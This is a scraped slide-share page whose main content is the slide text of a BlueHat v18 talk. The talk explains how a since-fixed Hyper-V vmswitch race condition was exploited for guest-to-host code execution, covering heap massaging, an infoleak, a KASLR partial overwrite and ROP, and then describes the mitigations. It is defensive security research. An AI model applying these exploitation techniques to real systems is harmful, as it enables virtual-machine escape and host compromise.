Improving the Performance of the qcow2 Format (KVM Forum 2017)
PDF
Fun with Network Interfaces
CSW2017 Peng qiu+shefang-zhong win32k -dark_composition_finnal_finnal_rm_mark
FreeBSD and Drivers
Kernel Recipes 2019 - Hunting and fixing bugs all over the Linux kernel
VLANs in the Linux Kernel
Linux kernel debugging(ODP format)
Lock free programming- pro tips
Kernel Recipes 2015: Anatomy of an atomic KMS driver
LCU14 209- LLVM Linux
Testing CAN network with help of CANToolz
Dead Lock Analysis of spin_lock() in Linux Kernel (english)
Kernel Recipes 2015 - Hardened kernels for everyone
CSW2017 Henry li how to find the vulnerability to bypass the control flow gua...
Kernel Recipes 2019 - CVEs are dead, long live the CVE!
Kernel_Crash_Dump_Analysis
Linux Kernel Debugging Essentials workshop
Linux Network Stack
Debugging linux kernel tools and techniques
Kernel Recipes 2015: Introduction to Kernel Power Management
Improving the Performance of the qcow2 Format (KVM Forum 2017)
Fun with Network Interfaces
Ad

Similar to BlueHat v18 || Hardening hyper-v through offensive security research (20)

PDF
Windows internals Essentials
PPTX
Porting NetBSD to the open source LatticeMico32 CPU
PDF
ISA_databook_for_verification_121414.pdf
PPT
Linux memory
PDF
Operating Systems 1 (3/12) - Architectures
PPTX
Back to the CORE
PPT
operating system
PPTX
operating system
PPTX
02-OS-review.pptx
PPTX
Making a Process (Virtualizing Memory)
PPT
the windows opereting system
PPT
Earhart
PDF
Bài tập lớn hệ điều hành HCMUT_HK232.pdf
PPT
08 operating system support
PDF
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
PPTX
Io sy.stemppt
PPT
08 operating system support
PPT
kerch04.ppt
PPT
Lec10 Computer Architecture by Hsien-Hsin Sean Lee Georgia Tech -- Memory part2
Windows internals Essentials
Porting NetBSD to the open source LatticeMico32 CPU
ISA_databook_for_verification_121414.pdf
Linux memory
Operating Systems 1 (3/12) - Architectures
Back to the CORE
operating system
operating system
02-OS-review.pptx
Making a Process (Virtualizing Memory)
the windows opereting system
Earhart
Bài tập lớn hệ điều hành HCMUT_HK232.pdf
08 operating system support
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
Io sy.stemppt
08 operating system support
kerch04.ppt
Lec10 Computer Architecture by Hsien-Hsin Sean Lee Georgia Tech -- Memory part2
Ad

More from BlueHat Security Conference (20)

PDF
BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...
PDF
BlueHat Seattle 2019 || Keynote
PDF
BlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One Story
PDF
BlueHat Seattle 2019 || Kubernetes Practical Attack and Defense
PDF
BlueHat Seattle 2019 || Open Source Security, vulnerabilities never come alone
PDF
BlueHat Seattle 2019 || Modern Binary Analysis with ILs
PDF
BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.
PDF
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
PDF
BlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
PDF
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
PDF
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
PDF
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
PDF
BlueHat v18 || First strontium uefi rootkit unveiled
PDF
BlueHat v18 || WSL reloaded - Let's try to do better fuzzing
PDF
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
PDF
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
PDF
BlueHat v18 || Memory resident implants - code injection is alive and well
PDF
BlueHat v18 || Massive scale usb device driver fuzz without device
PDF
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
PDF
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Seattle 2019 || The cake is a lie! Uncovering the secret world of mal...
BlueHat Seattle 2019 || Keynote
BlueHat Seattle 2019 || Guarding Against Physical Attacks: The Xbox One Story
BlueHat Seattle 2019 || Kubernetes Practical Attack and Defense
BlueHat Seattle 2019 || Open Source Security, vulnerabilities never come alone
BlueHat Seattle 2019 || Modern Binary Analysis with ILs
BlueHat Seattle 2019 || Don't forget to SUBSCRIBE.
BlueHat Seattle 2019 || I'm in your cloud: A year of hacking Azure AD
BlueHat Seattle 2019 || Autopsies of Recent DFIR Investigations
BlueHat Seattle 2019 || The good, the bad & the ugly of ML based approaches f...
BlueHat Seattle 2019 || Are We There Yet: Why Does Application Security Take ...
BlueHat Seattle 2019 || Building Secure Machine Learning Pipelines: Security ...
BlueHat v18 || First strontium uefi rootkit unveiled
BlueHat v18 || WSL reloaded - Let's try to do better fuzzing
BlueHat v18 || The hitchhiker's guide to north korea's malware galaxy
BlueHat v18 || Retpoline - the anti-spectre (type 2) mitigation in windows
BlueHat v18 || Memory resident implants - code injection is alive and well
BlueHat v18 || Massive scale usb device driver fuzz without device
BlueHat v18 || Modern day entomology - examining the inner workings of the bu...
BlueHat v18 || The matrix has you - protecting linux using deception

Recently uploaded (20)

DOCX
search engine optimization ppt fir known well about this
PDF
The influence of sentiment analysis in enhancing early warning system model f...
PDF
sbt 2.0: go big (Scala Days 2025 edition)
PPTX
The various Industrial Revolutions .pptx
PDF
1 - Historical Antecedents, Social Consideration.pdf
PDF
Hindi spoken digit analysis for native and non-native speakers
PDF
A Late Bloomer's Guide to GenAI: Ethics, Bias, and Effective Prompting - Boha...
PPTX
Chapter 5: Probability Theory and Statistics
PPTX
Final SEM Unit 1 for mit wpu at pune .pptx
PPTX
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
PDF
A review of recent deep learning applications in wood surface defect identifi...
PPTX
Configure Apache Mutual Authentication
PDF
UiPath Agentic Automation session 1: RPA to Agents
PDF
Hybrid horned lizard optimization algorithm-aquila optimizer for DC motor
PPTX
Benefits of Physical activity for teenagers.pptx
PDF
OpenACC and Open Hackathons Monthly Highlights July 2025
PDF
Two-dimensional Klein-Gordon and Sine-Gordon numerical solutions based on dee...
PPTX
Microsoft Excel 365/2024 Beginner's training
PDF
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
PDF
STKI Israel Market Study 2025 version august
search engine optimization ppt fir known well about this
The influence of sentiment analysis in enhancing early warning system model f...
sbt 2.0: go big (Scala Days 2025 edition)
The various Industrial Revolutions .pptx
1 - Historical Antecedents, Social Consideration.pdf
Hindi spoken digit analysis for native and non-native speakers
A Late Bloomer's Guide to GenAI: Ethics, Bias, and Effective Prompting - Boha...
Chapter 5: Probability Theory and Statistics
Final SEM Unit 1 for mit wpu at pune .pptx
MicrosoftCybserSecurityReferenceArchitecture-April-2025.pptx
A review of recent deep learning applications in wood surface defect identifi...
Configure Apache Mutual Authentication
UiPath Agentic Automation session 1: RPA to Agents
Hybrid horned lizard optimization algorithm-aquila optimizer for DC motor
Benefits of Physical activity for teenagers.pptx
OpenACC and Open Hackathons Monthly Highlights July 2025
Two-dimensional Klein-Gordon and Sine-Gordon numerical solutions based on dee...
Microsoft Excel 365/2024 Beginner's training
From MVP to Full-Scale Product A Startup’s Software Journey.pdf
STKI Israel Market Study 2025 version august

BlueHat v18 || Hardening hyper-v through offensive security research

  • 1. Hardening Hyper-V through offensive security research Jordan Rabet, Microsoft OSR Live demo! Note: all vulnerabilities mentioned in this talk have been addressed
  • 4. Hardware Guest OSHost OS Kernel modeKernel mode User modeUser mode vmbus Storage Physical memoryNetwork card Hyper-V architecture: layout CPUs … Hypercalls Address manager MSRs … 4 Hypervisor
  • 5. Storage Physical memoryNetwork card storVSC storVSP I/O stack foo.exe I/O stack Hyper-V architecture: accessing hardware resources from Guest OS CPUs … Hypercalls Address manager MSRs … 5 vmbus Kernel modeKernel mode User modeUser mode Hardware Guest OSHost OS Hypervisor
  • 6. vmbus internals: small packet Physical addresses (PA) Guest Virtual Addresses (GVA) Guest Physical Addresses (GPA) System Virtual Addresses (SVA) 6 Kernel modeKernel mode Guest OSHost OS Physical memory Host physical memory Guest physical memory Shared virtual ringbufferShared virtual ringbuffer System Physical Addresses (SPA) VSC vmbusvmbusr VSP Packet Packet Packet Packet Packet
  • 7. vmbus internals: small packet passing a direct mapping (GPADL) Packet PacketGPADL GPADL Physical addresses (PA) Guest Virtual Addresses (GVA) Guest Physical Addresses (GPA) System Virtual Addresses (SVA) 7 Kernel modeKernel mode Guest OSHost OS Physical memory Host physical memory Guest physical memory Shared virtual ringbufferShared virtual ringbuffer System Physical Addresses (SPA)
  • 8. VSP case study: vmswitch
  • 9. Storage Physical memoryNetwork card netVSC vmswitch I/O stack I/O stack vmswitch: virtualized network provider vmswitch is a VSP, lives in host kernel netVSC tunnels traffic over to vmswitch CPUs … Hypercalls Address manager MSRs … 9 vmbus Kernel modeKernel mode User modeUser mode foo.exe Hardware Guest OSHost OS Hypervisor vmswitch emulates a network card through the RNDIS protocol
  • 10. Guest OSHost OS Kernel modeKernel mode Host physical memory Guest physical memory Physical memory Receive BufferSend BufferReceive Buffer Send Buffer vmbus messages 10 vmswitch: initialization sequence
  • 11. Guest OSHost OS Kernel modeKernel mode Receive buffer Send buffer vmbus messages … netVSC RNDIS CMPLT RNDIS QUERY 11 vmswitch vmswitch: sending RNDIS packets
  • 12. Receive buffer Send buffer Host OSKernel mode vmswitch: how are RNDIS messages handled? vmbus channel RNDIS SET RNDIS MSG queue RNDIS worker thread 1 Channel thread RNDIS CMPLT RNDIS CMPLT RNDIS worker thread 2 vmswitch 12 RNDIS QUERY RNDIS QUERY RNDIS CMPLT RNDIS SET RNDIS SET RNDIS CMPLT SEND_RNDIS_PKT SUBALLOC 0 SEND_RNDIS_PKT SUBALLOC 2 RNDIS QUERY
  • 14. Guest OSHost OS Kernel modeKernel mode Host physical memory Guest physical memory Physical memory Messing with the initialization sequence Receive Buffer Pointer GPADL 0 GPADL 1 GPADL 2GPADL 0 GPADL 1 GPADL 2 14
  • 15. vmswitch receive buffer update Receive buffer update isn’t atomic 1. Updates the pointer to the buffer 2. Generates and updates sub-allocations No locking on the receive buffer • It could be used in parallel Update pointer to receive buffer 1 15 Generate bounds of sub-allocations 2 Update bounds of sub-allocations 3
  • 16. Host OSKernel mode vmswitch receive buffer update GPADL 0 vmswitch vmbus channel GPADL 1 Receive Buffer Pointer 16 Update pointer to receive buffer 1 Generate bounds of sub-allocations 2 Update bounds of sub-allocations 3
  • 17. vmswitch receive buffer update • During this short window, we can have out-of-bound sub-allocations • This results in a useful out-of-bounds write if: 1. We can control the data being written 2. We can win the race 3. We can place a corruption target adjacent to the receive buffer Receive buffer race condition GPADL 1 17 Update pointer to receive buffer 1 Generate bounds of sub-allocations 2 Update bounds of sub-allocations 3
  • 18. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target ? ? ?
  • 19. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target ? ? ?
  • 20. Controlling the OOB write contents • OOB write contents: RNDIS control message responses • RNDIS_QUERY_MSG messages can return large buffers of data 20 Offset Size Field 0 4 MessageType 4 4 MessageLength 8 4 RequestId 12 4 Status 16 4 InformationBufferLength 20 4 InformationBufferOffset
  • 21. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target ? ?
  • 22. Host OSKernel mode vmswitch: handling RNDIS messages is asynchronous, but not really vmbus channel RNDIS MSG queue RNDIS worker thread 1 RNDIS MSG 0 CMPLT RNDIS worker thread 2 vmswitch RNDIS MSG 0 RNDIS MSG 1 RNDIS MSG 2 RNDIS MSG 0 RNDIS MSG 1 CMPLT RNDIS MSG 1 Waiting on MSG 0 ack from guest Waiting on MSG 1 ack from guest 22 Channel thread
  • 23. Winning the race: delaying one RNDIS message? • Can’t have RNDIS messages continuously write to the receive buffer • But we don’t need continuous RNDIS messages – we just need one • Can we send an RNDIS message and have it be processed in a delayed way? • No by-design way of delaying RNDIS messages… • …but not all messages require an ack from the guest • Example: malformed RNDIS_KEEPALIVE_MSG message • Idea: “cascade of failure” • Block off all RNDIS worker threads • Chain N malformed RNDIS_KEEPALIVE_MSG messages • Append a single valid RNDIS message 23
  • 24. Kernel mode The Cascade Of Failure: making the host race itself vmbus channel RNDIS MSG queue RNDIS MSG 0 CMPLT vmswitch RNDIS MSG 0 RNDIS MSG 1 CMPLT RNDIS MSG 1 Waiting on MSG 0 ack from guest RNDIS MSG 4 RNDIS MSG 5 RNDIS MSG 6 RNDIS MSG 7 RNDIS MSG 3 Host OS RNDIS MSG 8 CMPLT RNDIS MSG 8 Written to the receive buffer after a controlled delay Waiting on MSG 1 ack from guest 24 Channel thread RNDIS worker thread 1 RNDIS worker thread 2
  • 25. Winning the race: configuring the delay • We can delay the event by N time units, but what’s N’s value? • We have a limited number of tries: need to be smart • Can we distinguish between race attempt outcomes? • If so we could search for the right N • If we’re too early, increase N • If we’re too late, decrease N • If we’re just right… celebrate ☺ 25
  • 26. GPADL 0 Too early Too late Just right RNDIS CMPLT 26 GPADL 1 RNDIS CMPLT GPADL 1 RNDIS CMPLT Update pointer to receive buffer 1 Update bounds of sub-allocations 3
  • 27. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target?
  • 28. Finding a target: other GPADL/MDLs and… stacks 0: kd> !address ... ffffdd80`273bb000 ffffdd80`273c1000 0`00006000 SystemRange Stack Thread: ffffc903f188b080 ffffdd80`273c1000 ffffdd80`273c6000 0`00005000 SystemRange ffffdd80`273c6000 ffffdd80`273cc000 0`00006000 SystemRange Stack Thread: ffffc903eed10800 ffffdd80`273cc000 ffffdd80`273cf000 0`00003000 SystemRange ffffdd80`273cf000 ffffdd80`273d5000 0`00006000 SystemRange Stack Thread: ffffc903f182b080 ffffdd80`273d5000 ffffdd80`27606000 0`00231000 SystemRange ffffdd80`27606000 ffffdd80`2760c000 0`00006000 SystemRange Stack Thread: ffffc903f181f080 ffffdd80`2760c000 ffffdd80`2760d000 0`00001000 SystemRange ffffdd80`2760d000 ffffdd80`27613000 0`00006000 SystemRange Stack Thread: ffffc903ee878080 ffffdd80`27613000 ffffdd80`27625000 0`00012000 SystemRange ffffdd80`27625000 ffffdd80`2762b000 0`00006000 SystemRange Stack Thread: ffffc903ee981080 ffffdd80`2762b000 ffffdd80`2762c000 0`00001000 SystemRange ffffdd80`2762c000 ffffdd80`27632000 0`00006000 SystemRange Stack Thread: ffffc903f1bc64c0 ... 28
  • 29. Finding a target: kernel stacks • Windows kernel stacks • Fixed 7 page allocation size • 6 pages of stack space • 1 guard page at the bottom • Allocated in the SystemPTE region • Great corruption target if within range – gives instant ROP • Problems • How does the SystemPTE region allocator work? • Can we reliably place a stack at a known offset from our receive buffer? • Can we even “place” a stack? How do we spawn threads? 29
  • 30. Allocation bitmap • Bitmap based • Each bit represents a page • Bit 0 means free page, 1 means allocated • Uses a “hint” for allocation • Scans bitmap starting from hint • Wraps around bitmap if needed • Places hint at tail of successful allocations • Bitmap is expanded if no space is found SystemPTE allocator Free page Allocated page Bitmap hint 30
  • 31. Allocation bitmap • Bitmap based • Each bit represents a page • Bit 0 means free page, 1 means allocated • Uses a “hint” for allocation • Scans bitmap starting from hint • Wraps around bitmap if needed • Places hint at tail of successful allocations • Bitmap is expanded if no space is found • Example 1: allocating 5 pages SystemPTE allocator Free page Allocated page Bitmap hint 31
  • 32. Allocation bitmap • Bitmap based • Each bit represents a page • Bit 0 means free page, 1 means allocated • Uses a “hint” for allocation • Scans bitmap starting from hint • Wraps around bitmap if needed • Places hint at tail of successful allocations • Bitmap is expanded if no space is found • Example 1: allocating 5 pages • Example 2: allocating 5 pages again SystemPTE allocator Free page Allocated page Bitmap hint 32
  • 33. Allocation bitmap • Bitmap based • Each bit represents a page • Bit 0 means free page, 1 means allocated • Uses a “hint” for allocation • Scans bitmap starting from hint • Wraps around bitmap if needed • Places hint at tail of successful allocations • Bitmap is expanded if no space is found • Example 1: allocating 5 pages • Example 2: allocating 5 pages again • Example 3: allocating 17 pages SystemPTE allocator Free page Allocated page Bitmap hint 33
  • 34. SystemPTE massaging: allocation primitives • Receive/send buffers: can map any number of arbitrarily sized MDLs • (“arbitrary”: still have size/number limits, but they’re pretty high) • Some vmswitch messages use System Worker Threads • NT-maintained thread pool • More threads added to the pool when others are busy • Idea: trigger many async tasks quickly in a row • If enough are queued, more threads are spawned • Helper: deadlock bug in async task lets us lock existing worker threads • As a result: we can spray a handful of kernel stacks 34
  • 35. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks Two possible outcomes, both manageable SystemPTE massaging strategy Free page Allocated page Bitmap hint 35
  • 36. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Outcome #1 36
  • 37. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Outcome #1 37
  • 38. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Outcome #1 38
  • 39. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Outcome #1 39
  • 40. Allocation bitmap 1. Spray 1MB buffers 2. Allocate a 2MB - 1 page buffer • (SystemPTE expansions are done in 2MB steps) 3. Allocate a 1MB buffer 4. Allocate a 1MB - 7 pages buffer 5. Spray stacks SystemPTE massaging strategy Free page Allocated page Bitmap hint Replaceable receive buffer Thread stack Outcome #1 40
  • 41. Exploiting the vulnerability Controlling what’s written out-of-bounds Winning the race Finding a reliable corruption target Bypassing KASLR?
  • 43. nvsp_message struct • Represents messages sent to/from vmswitch over vmbus 43 struct nvsp_message { struct nvsp_message_header hdr; union nvsp_all_messages msg; } __packed;
  • 44. 44 NVSP_MSG1_TYPE_SEND_ RNDIS_PKT_COMPLETE NVSP_MSG1_TYPE_SEND_ NDIS_VER UINT32 hdr.msg_type UINT32 ndis_major_ver UINT32 ndis_minor_ver UINT32 hdr.msg_type UINT32 status sizeof(nvsp_message) UINT32 hdr.msg_type UINT32 ndis_major_ver UINT32 ndis_minor_ver UINT32 hdr.msg_type UINT32 status msg.send_ndis_ver msg.send_rndis_pkt_complete
  • 45. nvsp_message Infoleak UINT32 MessagetypeUINT32 hdr.msg_type UINT32 status 32 uninitialized stack bytes 45 • nvsp_message is allocated on the stack • Only the first 8 bytes are initialized • sizeof(nvsp_message) is returned  32 bytes of uninitialized stack memory are sent back to guest  can leak a vmswitch return address  we have enough to build a ROP chain and overwrite a kernel thread stack!
  • 46. Bypassing KASLR without an infoleak • Our infoleak applied to Windows Server 2012 R2, but not Windows 10 • Oops • How do we deal with KASLR without an infoleak? • KASLR only aligns most modules up to a 0x10000 byte boundary • As a result, partial overwrites are an option • Example: • Return address is: 0xfffff808e059f3be (RndisDevHostDeviceCompleteSetEx+0x10a) • Corrupt it to: 0xfffff808e04b8705 (ROP gadget: pop r15; ret;) • Can only do a single partial overwrite though… is that useful? • Only one partial overwrite because our OOB write is contiguous 46
  • 47. SystemPTE massaging Free page Allocated page Replaceable receive buffer SystemPTE massaging Thread stack Send buffer immediately after target stack 47
  • 48. Partial overwrite • What if we use it to get RSP into our send buffer? • Target return address: 0xFFFFF808E059F3BE • We corrupt it to: 0xFFFFF808E059DA32 • We end up doing RSP += 0xE78 • This moves RSP into our send buffer… … which is shared with the guest lea r11, [rsp+0E50h] mov rbx, [r11+38h] mov rbp, [r11+40h] mov rsp, r11 ... ret RSP ... … FFFFC500F5FFF700 … FFFFC500F5FFF800 0xFFFFF808E059DA32 FFFFC500F5FFF900 … FFFFC500F5FFFA00 … FFFFC500F5FFFB00 … FFFFC500F5FFFC00 … FFFFC500F5FFFD00 … FFFFC500F5FFFE00 … FFFFC500F5FFFF00 … FFFFC500F6000000 00 00 00 00 00 00 00 00 FFFFC500F6000100 00 00 00 00 00 00 00 00 FFFFC500F6000200 00 00 00 00 00 00 00 00 FFFFC500F6000300 00 00 00 00 00 00 00 00 FFFFC500F6000400 00 00 00 00 00 00 00 00 FFFFC500F6000500 00 00 00 00 00 00 00 00 FFFFC500F6000600 00 00 00 00 00 00 00 00 FFFFC500F6000700 00 00 00 00 00 00 00 00 FFFFC500F6000800 00 00 00 00 00 00 00 00 FFFFC500F6000900 ... 00 00 00 00 00 00 00 00 … ... … FFFFC500F5FFF700 … FFFFC500F5FFF800 0xFFFFF808E059F3BE FFFFC500F5FFF900 … FFFFC500F5FFFA00 … FFFFC500F5FFFB00 … FFFFC500F5FFFC00 … FFFFC500F5FFFD00 … FFFFC500F5FFFE00 … FFFFC500F5FFFF00 … FFFFC500F6000000 00 00 00 00 00 00 00 00 FFFFC500F6000100 00 00 00 00 00 00 00 00 FFFFC500F6000200 00 00 00 00 00 00 00 00 FFFFC500F6000300 00 00 00 00 00 00 00 00 FFFFC500F6000400 00 00 00 00 00 00 00 00 FFFFC500F6000500 00 00 00 00 00 00 00 00 FFFFC500F6000600 00 00 00 00 00 00 00 00 FFFFC500F6000700 00 00 00 00 00 00 00 00 FFFFC500F6000800 00 00 00 00 00 00 00 00 FFFFC500F6000900 ... 00 00 00 00 00 00 00 00 … 48 Kernel thread stack Shared buffer
  • 49. Host kernel stack in shared memory: what now? 1. The host CPU core throws a General Protection Fault (GPF) • No KASLR bypass means the RET instruction will necessarily cause a fault 2. The address where the GPF happened is dumped to the stack • In shared memory! We can read it, and that’s our KASLR bypass 3. Windows executes its GPF handler, still with the stack in shared memory 4. As attackers, we can: 1. Locate valid ROP gadget thanks to addresses being dumped to the stack 2. Manipulate the stack as the exception handler is being executed • Includes exception records and of course other return addresses 5. As a result, we get ROP execution in host ☺ 49
  • 52. Vulnerability discovery Exploitation Post-exploitation Breaking the chain 1 2 3 Targeted, continuous internal code review effort Break exploit techniques Make components less attractive targets, invest in detection
  • 53. Hardening: kernel stack isolation To prevent overflowing into kernel stacks, we’ve moved them to their own region 0: kd> !address ... ffffae8f`050a8000 ffffae8f`050a9000 0`00001000 SystemRange ffffae8f`050a9000 ffffae8f`050b0000 0`00007000 SystemRange Stack Thread: ffffbc8934d51700 ffffae8f`050b0000 ffffae8f`050b1000 0`00001000 SystemRange ffffae8f`050b1000 ffffae8f`050b8000 0`00007000 SystemRange Stack Thread: ffffbc8934d55700 ffffae8f`050b8000 ffffae8f`050b9000 0`00001000 SystemRange ffffae8f`050b9000 ffffae8f`050c0000 0`00007000 SystemRange Stack Thread: ffffbc8934d59700 ffffae8f`050c0000 ffffae8f`050c1000 0`00001000 SystemRange ffffae8f`050c1000 ffffae8f`050c8000 0`00007000 SystemRange Stack Thread: ffffbc8934d5d700 ... 53
  • 54. Hardening: other kernel mitigations • Hypervisor-enforced Code Integrity (HVCI) • Attackers can’t inject arbitrary code into Host kernel • Kernel-mode Control Flow Guard (KCFG) • Attackers can’t achieve kernel ROP by hijacking function pointers • Work is being done to enable these features by default • Future hardware security features: CET • Hardware shadow stacks to protect return addresses and prevent ROP 54
  • 55. Storage Physical memoryNetwork card VMWP.exe VSMB I/O stack Hyper-V architecture: virtualization providers can be in user-mode CPUs … Hypercalls Address manager MSRs … 55 vmbus Kernel modeKernel mode User modeUser mode Hardware Guest OSHost OS Hypervisor I/O stack foo.exe
  • 56. Hardening: VM Worker Process • Improved sandbox • Removed SeImpersonatePrivilege • Improved RCE mitigations • Enabled CFG export suppression • Large reduction in number of valid CFG targets • Enabled “Force CFG” • Only CFG-enabled modules modules can be loaded into VMWP • Several Hyper-V components being put in VMWP rather than kernel 56
  • 57. The Hyper-V bounty program • Up to $250,000 payout • Looking for code execution, infoleaks and denial of service issues • https://technet.microsoft.com/en-us/mt784431.aspx • Getting started • Joe Bialek and Nicolas Joly’s talk: “A Dive in to Hyper-V Architecture & Vulnerabilities” • Hyper-V Linux integration services • Open source, well-commented code available on Github • Good way to understand VSP interfaces and experiment! • Public symbols for some Hyper-V components 57
  • 58. Thank you for your time Special thanks to Matt Miller, David Weston, the Hyper-V team, the vmswitch team, the MSRC team and all my OSR buddies 58
  • 61. Kernel modeKernel mode User modeUser mode Storage Physical memoryNetwork card VMWP.exe VSMB Hyper-V architecture: VMWP compromise Malicious guest Host technically compromised, but limited to VMWP user-mode CPUs … Hypercalls Address manager MSRs … 61 vmbus Hardware Guest OSHost OS Hypervisor
  • 62. Kernel modeKernel mode User modeUser mode Storage Physical memoryNetwork card VMWP.exe VSMB Hyper-V architecture: VMWP to host kernel compromise Malicious guest Attacker escapes user-mode through local kernel, driver exploit… NT CPUs … Hypercalls Address manager MSRs … 62 vmbus Hardware Guest OSHost OS Hypervisor
  • 63. Kernel modeKernel mode User modeUser mode Storage Physical memoryNetwork card VMWP.exe VSMB Hyper-V architecture: VMWP to host kernel compromise Malicious guest Attacker goes for host kernel directly through VSP surface storVSP CPUs … Hypercalls Address manager MSRs … 63 vmbus Hardware Guest OSHost OS Hypervisor
  • 64. Kernel modeKernel mode User modeUser mode Storage Physical memoryNetwork card VMWP.exe VSMB Hyper-V architecture: hypervisor compromise Malicious guest Attacker compromises hypervisor, either directly from guest or through the host CPUs … Hypercalls Address manager MSRs … 64 vmbus Hardware Guest OSHost OS Hypervisor
  • 65. Guest OSHost OS Kernel modeKernel mode Host physical memory Guest physical memory Physical memory vmswitch initialization: NVSP_MSG5_TYPE_SUBCHANNEL Subchannel 1 vmbus buffer Subchannel 2 vmbus buffer Subchannel 3 vmbus buffer Receive Buffer Send Buffer Subchannel 1 vmbus buffer Subchannel 2 vmbus buffer Subchannel 3 vmbus buffer Receive Buffer Send Buffer vmswitch initialization: NVSP_MSG1_TYPE_SEND_SEND_BUFvmswitch initialization: NVSP_MSG1_TYPE_SEND_RECV_BUFvmswitch initialization: NVSP_MSG1_TYPE_SEND_NDIS_VERvmswitch initialization: NVSP_MSG_TYPE_INIT vmbus messages 65
  • 66. Receive buffer Send buffer Host OSKernel mode vmswitch: how are RNDIS messages handled? vmbus channel Channel message batch RNDIS SET SEND_RNDIS_PKT SUBALLOC 0 SEND_RNDIS_PKT SUBALLOC 2 RNDIS MSG queue RNDIS worker thread 1 Channel thread RNDIS CMPLT RNDIS CMPLT RNDIS worker thread 2 vmswitch 66 RNDIS QUERY RNDIS QUERY RNDIS CMPLT RNDIS SET RNDIS SET RNDIS CMPLT SEND_RNDIS_PKT SUBALLOC 0 SEND_RNDIS_PKT SUBALLOC 2 RNDIS QUERY
  • 67. vmswitch messages None Initializing HaltedOperational RNDIS_INITIALIZE_MSG RNDIS_HALT_MSG NVSP_MSG_TYPE_INIT RNDIS_INITIALIZE_MSG RNDIS_HALT_MSG 0 1 2 3 NVSP Message Type State # 0 1 2 3 NVSP_MSG_TYPE_INIT NVSP_MSG1_TYPE_SEND_NDIS_VER NVSP_MSG1_TYPE_SEND_RECV_BUF NVSP_MSG1_TYPE_REVOKE_RECV_BUF NVSP_MSG1_TYPE_SEND_SEND_BUF NVSP_MSG1_TYPE_REVOKE_SEND_BUF NVSP_MSG1_TYPE_SEND_RNDIS_PKT NVSP_MSG5_TYPE_SUBCHANNEL 67 vmswitch state machine
  • 68. vmswitch takeaways • Send/receive buffers are used to transfer many messages at a time • Opposite end needs to be prompted over vmbus to read from them • vmswitch relies on different threads for different tasks • vmbus dispatch threads • Setup send/receive buffers, subchannels… • Read RNDIS messages from send buffer • The system worker threads • Process RNDIS messages • Write responses to receive buffer • Subchannels only increase bandwidth in that they allow us to alert the opposite end more often 68
  • 69. vmswitch state machine None Initializing HaltedOperational RNDIS_INITIALIZE_MSG RNDIS_HALT_MSG NVSP_MSG_TYPE_INIT RNDIS_INITIALIZE_MSG RNDIS_HALT_MSG 0 1 2 3 NVSP Message Type State # 0 1 2 3 NVSP_MSG_TYPE_INIT NVSP_MSG1_TYPE_SEND_NDIS_VER NVSP_MSG1_TYPE_SEND_RECV_BUF NVSP_MSG1_TYPE_REVOKE_RECV_BUF NVSP_MSG1_TYPE_SEND_SEND_BUF NVSP_MSG1_TYPE_REVOKE_SEND_BUF NVSP_MSG1_TYPE_SEND_RNDIS_PKT NVSP_MSG5_TYPE_SUBCHANNEL 69
  • 70. vmswitch state machine NVSP Message Type State # 0 1 2 3 NVSP_MSG_TYPE_INIT NVSP_MSG1_TYPE_SEND_NDIS_VER NVSP_MSG1_TYPE_SEND_RECV_BUF NVSP_MSG1_TYPE_REVOKE_RECV_BUF NVSP_MSG1_TYPE_SEND_SEND_BUF NVSP_MSG1_TYPE_REVOKE_SEND_BUF NVSP_MSG1_TYPE_SEND_RNDIS_PKT NVSP_MSG5_TYPE_SUBCHANNEL • Easy way to win the race: queue up RNDIS messages and keep having them write to receive buffer continuously • Doesn’t work: RNDIS threads blocked until ack from guest • Ack and buffer replacement happen on same channel: can’t happen simultaneously… • …unless we use subchannels! • Multiple channels = simultaneity • …but we can’t because of the state machine Winning the race: continuous writing? 0 1 2 3 70
